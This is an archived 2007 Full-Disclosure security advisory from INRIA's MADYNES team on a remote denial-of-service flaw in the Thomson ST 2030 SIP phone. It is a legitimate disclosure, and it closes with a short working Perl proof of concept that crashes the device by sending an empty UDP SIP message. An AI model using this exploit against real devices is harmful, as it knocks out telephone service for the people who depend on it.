lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <004101c7e974$0e629b90$5e0c5198@Crocodile>
Date: Tue, 28 Aug 2007 15:05:06 +0200
From: "Radu State" <State@...ia.fr>
To: <full-disclosure@...ts.grok.org.uk>
Subject: DOS vulnerability on Thomson SIP phone ST 2030
	using an empty packet

MADYNES Security Advisory :  Remote DOS on Thomson SIP phone  ST 2030 using
an empty packet

 

Date of Discovery 15  February, 2007

 

Vendor was notified on 1 March 2007

 

ID: KIPH10

 

Synopsis

 

After sending an empty message the device looks functional but in fact does
not respond to any event provoking a DoS

 

 

Background 

 

SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalization. SIP is an ASCII based INVITE message is used to initiate and
maintain a communication session. 

 

 

Affected devices:  Thomson SIP phone ST 2030

 

Impact :

A malicious user can remotely crash and perform a denial of service attack
by sending one crafted void SIP   message. 

 

Resolution

Fixed software will be available from the vendor and customers following
recommended best practices (ie segregating VOIP traffic from data) will be
protected from malicious traffic in most situations. 

 

Credits

 

Humberto J. Abdelnur (Ph.D Student) 

Radu State (Ph.D) 

Olivier Festor (Ph.D) 

 

This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH (for a description see
http://hal.inria.fr/inria-00166947/en),

 

 

 

Configuration of our device:

 

 

Software Version:   v1.52.1 

IP-Address obtained by DHCP as 192.168.1.106 

User name : thomson

 

 

To run the exploit the file thomson-2030-pl should be launched (assuming our
configurations) as:

 

POC Code:

 

perl thomson-2030.pl 192.168.1.106 5060 thomson

 

 

 

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

 

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);

 

$msg = "";

$socket->send($msg);

 

 

 


Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ